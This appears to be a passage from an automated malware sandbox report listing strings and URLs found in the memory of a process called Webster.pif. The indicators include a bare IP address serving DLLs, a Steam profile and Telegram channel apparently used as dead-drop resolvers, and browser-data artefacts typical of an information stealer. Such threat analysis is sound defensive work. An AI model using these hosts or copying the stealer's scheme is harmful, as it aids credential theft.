                        Source: Webster.pif, 0000000B.00000002.3321827446.0000000001854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/softokn3.dllNm
                        Source: Webster.pif, 0000000B.00000002.3321760579.00000000017DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/sqls.dll
                        Source: Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/ts8
                        Source: Webster.pif, 0000000B.00000002.3321827446.0000000001854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/vcruntime140.dll
                        Source: Webster.pif, 0000000B.00000002.3322725102.000000000495E000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60CBAFIJ
                        Source: AEGHJK.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322051688.0000000001A73000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321976352.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, DAAAFB.11.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322051688.0000000001A73000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321976352.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, DAAAFB.11.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                        Source: AEGHJK.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: AEGHJK.11.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: AEGHJK.11.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=eZOyL2UG5OX8&a
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=e0OV
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&l=e
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322051688.0000000001A73000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321976352.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, DAAAFB.11.drString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322051688.0000000001A73000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321976352.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, DAAAFB.11.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                        Source: AEGHJK.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: AEGHJK.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: AEGHJK.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://help.steampowered.com/en/
                        Source: DAAAFB.11.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: https://mozilla.org0/
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/discussions/
                        Source: Webster.pif, 0000000B.00000002.3321760579.00000000017DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/fi
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199747278259
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/market/
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                        Source: Webster.pif, 0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B1E000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876421018.0000000001938000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876471328.00000000018B1000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322725102.00000000047F1000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B4B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321760579.00000000017DA000.00000004.00000020.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876514280.0000000001B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/badges
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321827446.0000000001854000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/inventory/
                        Source: Webster.pif, 0000000B.00000002.3321760579.00000000017DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259:
                        Source: Webster.pif, 0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B1E000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876421018.0000000001938000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876471328.00000000018B1000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322725102.00000000047F1000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B4B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876514280.0000000001B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/workshop/
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/about/
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/explore/
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/legal/
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/mobile
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/news/
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/points/shop/
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privac
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/stats/
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                        Source: KFIJJE.11.drString found in binary or memory: https://support.mozilla.org
                        Source: KFIJJE.11.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: KFIJJE.11.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
                        Source: Webster.pif, 0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B1E000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876421018.0000000001938000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876471328.00000000018B1000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322725102.00000000047F1000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B4B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876514280.0000000001B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/armad2a
                        Source: Webster.pif, 0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B1E000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876421018.0000000001938000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876471328.00000000018B1000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322725102.00000000047F1000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B4B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876514280.0000000001B4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/armad2ahellosqls.dllsqlite3.dllIn
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322051688.0000000001A73000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321976352.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, DAAAFB.11.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                        Source: file.exe, 00000000.00000003.2091955830.00000000026C6000.00000004.00000020.00020000.00000000.sdmp, Swim.0.dr, Webster.pif.2.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr String found in binary or memory: https://www.digicert.com/CPS0
                        Source: AEGHJK.11.dr String found in binary or memory: https://www.ecosia.org/newtab/
                        Source: Webster.pif.2.dr String found in binary or memory: https://www.globalsign.com/repository/0
                        Source: file.exe, 00000000.00000003.2091955830.00000000026C6000.00000004.00000020.00020000.00000000.sdmp, Swim.0.dr, Webster.pif.2.dr String found in binary or memory: https://www.globalsign.com/repository/06
                        Source: AEGHJK.11.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: KFIJJE.11.dr String found in binary or memory: https://www.mozilla.org
                        Source: KFIJJE.11.dr String found in binary or memory: https://www.mozilla.org#
                        Source: Webster.pif, 0000000B.00000002.3326384673.000000000C73F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
                        Source: KFIJJE.11.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                        Source: Webster.pif, 0000000B.00000002.3326384673.000000000C73F000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322725102.000000000495E000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
                        Source: KFIJJE.11.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                        Source: KFIJJE.11.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322051688.0000000001A73000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321976352.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, DAAAFB.11.dr String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                        Source: unknown HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.6:64167 version: TLS 1.2
                        Source: unknown HTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.6:64168 version: TLS 1.2
